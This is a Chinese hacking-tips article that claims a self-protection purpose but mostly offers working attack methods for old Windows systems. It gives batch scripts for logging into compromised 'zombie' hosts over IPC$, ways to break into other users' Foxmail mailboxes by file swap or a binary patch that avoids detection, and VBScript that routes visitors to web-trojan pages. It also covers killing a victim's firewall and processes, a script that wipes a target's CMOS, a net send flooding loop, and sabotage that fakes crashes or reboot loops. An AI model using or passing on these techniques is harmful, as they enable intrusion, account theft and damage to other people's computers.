背道而馳 保護系統做厚道小黑客

小黑客厚道學：掌握一些黑客知識是非常必要的，不是要攻擊別人，而是通過簡單的黑客知識掌握網路/系統安全技術，開拓思路，從而更好的保護自己的電腦。也就是所謂的「知己知彼百戰不殆」。

　　1、簡化CMD下用IPC$登錄肉雞的操作

　　用記事本建立一個名為login.bat文件，代碼如下：

　　@net use \\%1\ipc$ %3 /u:"%2"
　　@echo OK!連接已經建立成功！

　　使用方法是在CMD下輸入：login.bat肉雞的IP肉雞的ADMIN組的帳號名/用戶的密碼。這樣我們以後用IPC$登錄肉雞就不用每次都輸入一大串的命令了。

　　2、進入Foxmail賬戶有妙招

　　在Foxmail中可以為賬戶加上訪問密碼，如果沒有密碼卻想進入別人的信箱該怎麼辦呢？一個眾所周知的辦法是：打開Foxmail文件夾下以賬戶名命名的任意一個文件夾，裡邊有個名為account.stg的文件，把它複製到你想進入的賬戶目錄里，直接覆蓋該目錄下原來的account.stg文件。運行Foxmail，點擊那個忘記了密碼的賬戶，可以直接進入該信箱！但是上面的方法並不隱蔽，因為對方下次使用信箱時就會發現你破解了他的信箱，這樣不夠隱蔽。要想進入對方的信箱還不被對方發現，可以使用下面這個辦法：用16進位文件編輯器UltraEdit打開Foxamil的主程序foxmail.exe文件，按組合鍵Alt＋F3查找以下的代碼：E8617EE4FF7515，單擊「確定」開始查找，找到后把其中的7515改為9090，其他代碼不用改，然後保存就可以了。執行foxmail.exe，這樣可以隨意進入設有密碼的Foxmail郵箱。該技巧對最新的Foxmail5.0.500.0有效。

　　3、利用vbs腳本判斷對方的IE版本

　　我們在編製網頁木馬時，常常需要頁面具有自動判別對方IE版本的能力，根據版本的不同，跳轉到不同的網頁木馬頁面。之所以這樣做，是因為不同版本的IE，其木馬網頁的製作方法並不相同，比方說針對IE6.0版的網頁木馬製作方法與其下各個版本就不相同。

　　打開記事本，輸入如下內容：

　　「〈SCRIPT language=vbscript〉
　　if Instr(window.navigator.appversion,"MSIE 6.0")>0 then
　　alert("瀏 覽 器：Internet Explorer 6.0")
　　window.location.href="IE6.0網頁木馬頁面"
　　else
　　alert("瀏 覽 器：6.0版本以下")
　　window.location.href="IE6.0以下版網頁木馬頁面"
　　end if
　　〈/SCRIPT〉」

　　這樣，使用IE6.0的用戶瀏覽了該頁面后，會自動跳轉到"IE6.0網頁木馬頁面"，不是IE6.0的用戶瀏覽後會自動跳轉到"IE6.0以下版網頁木馬頁面"。

　　4、肉雞的ipc$打不開該怎麼辦

　　有些朋友反映telnet到對方的機器后卻不能打開ipc$，這該怎麼辦呢？我的做法是首先試試net share命令，看能不能使用，如果不能使用，說明對方沒有安裝文件和印表機共享服務，那ipc$一定是無法使用，此時只能放棄了。再輸入net share ipc$試試，看看ipc$能不能打開，如果不行就輸入net stop server，接下來再輸入net start server，這樣試試看ipc$能不能打開。如果net stop server不能執行，先把其附屬進程關閉，再關server的主進程，一般到此ipc$多半可以連接上了。如果還是不行，那多半是對方有防火牆，這時只能想辦法殺掉防火牆的進程了。

　　5、用vbs腳本結束進程

　　先聲明這一招不是我自己想到的，是從高手ilovewen那裡學來的。把下面的內容保存為.vbs腳本，在Windows2000下可以運行成功，代碼內容如下：

　　On Error Resume Next
　　strComputer="."Set objWMIService = GetObject("winmgmts:" _
　　&& "{impersonationLevel=impersonate}!\\" && strComputer && "\root\cimv2")Set colProcessList
　　=objWMIService.ExecQuery _
　　("Select * from Win32_Process Where Name='*.exe'")For Each objProcess in colProcessList
　　objProcess.Terminate()Next

　　其中*.exe是你要結束的進程，將它改為你要結束進程的名即可。

　　6、利用批處理清除對方的CMOS內容

　　如果你想清除對方的CMOS內容該怎麼辦？方法有很多了，利用批處理絕對是很另類的一招吧？請打開記事本，在文件中輸入如下內容：

　　Const ForAppending=8
　　Dim fso,x,y
　　Set fso=CreateObject("Scripting.FileSystemObject")
　　Set x=fso.OpenTextFile("c:\autoexec.bat", ForAppending, True)
　　Set y=fso.CreateTextFile("c:\1.txt", True)
　　x.WriteBlankLines(1)
　　x.Write"debug<1.txt"
　　x.WriteBlankLines(1)
　　y.WriteLine("o 70 10")
　　y.WriteBlankLines(1)
　　y.Write("o 71 10")
　　y.Close
　　x.Close

　　把上述內容保存為.bat文件，然後拷貝到對方的電腦上運行即可。它的作用是向Autoexec.bat中加入數據，創建一個文件，並向其中寫入內容，在他下次開機時調用debug清除掉CMOS設置，包括CMOS密碼。其實，這與大家常用的清除CMOS密碼的方法很相象，通常情況下清除CMOS密碼的方法是在DOS狀態下輸入debug，回車之後輸入如下命令即可手工清除密碼：

　　-o 70 10
　　-o 71 01
　　-q

　　7、利用批處理轟炸對方電腦

　　這是從一些高手那裡學來的招數，呵呵，真是好方法。具體步驟是，打開記事本，在裡面輸入如下內容：

　　@echo 正在轟炸中……
　　:start
　　@net send %1 %2
　　@if errorlevel 1 goto over
　　goto start　
　　ver
　　@echo 發送失敗

　　將其保存為任意名字的.bat文件即可。使用用法是：任意名字的.bat+空格+目標IP地址+空格+你要對他說的話。

　　8、戲弄非法用戶

　　為防止有人胡亂使用自己的電腦，我們可以利用批處理文件來戲弄一下非法用戶。方法是用記事本程序在Windows目錄中建立一個Winstart.bat文件，並在該文件中加入以下命令：
　
　　@echo off
　　echo non-system disk or disk error
　　choice/c:&&/n

　　上面代碼中的「&&」為我們設置的密碼，您可以自行設置。這樣重新啟動計算機開機時就會顯示「non-system disk or disk error」，接著游標一閃一閃的好像死機了一樣，造成非法用戶以為Windows死機的假象。有時就連高手也會上當受騙！當我們要進入系統時，只要輸入「&&」即可。

　　9、我的電腦你別用
　　
　　如果你不想讓別人使用你的電腦，又不好意思說，那該怎麼辦呢？在CMOS中設密碼，太小氣了吧？他如果問你密碼，你好意思不說嗎？其實，我們可以用下面這個辦法來欺騙一下他的眼睛，使他人以為電腦壞了。

　　方法是：進入MS-DOS方式或CMD窗口下，輸入：copy con null.sys，按一下回車鍵，然後什麼也別輸入，再按一次回車鍵，按Ctrl+Z或按F6鍵，屏幕上會顯示^z，按一下回車鍵，屏幕上會顯示「1 file(s) copied」，這樣就一個名為null.sys的空文件就建好了。現在，找到C盤根目錄下的config.sys文件，注意這個文件是隱藏屬性，所以必須進入「我的電腦」中，點擊「查看(v)」→「文件夾選項」→「查看」→「顯示所有文件」才能看到它，然後右鍵單擊該文件，在彈出菜單中選擇「用記事本打開」，接下來在config.sys文件中加入：device=c:\null.sys /d:null這樣一行，保存修改結果，退出記事本。以後，你的電腦就會在出現Windows的啟動畫面時自動重新啟動，如此反覆下去，別人一定以為你的電腦出問題了，而你就可以偷偷樂了。

不懂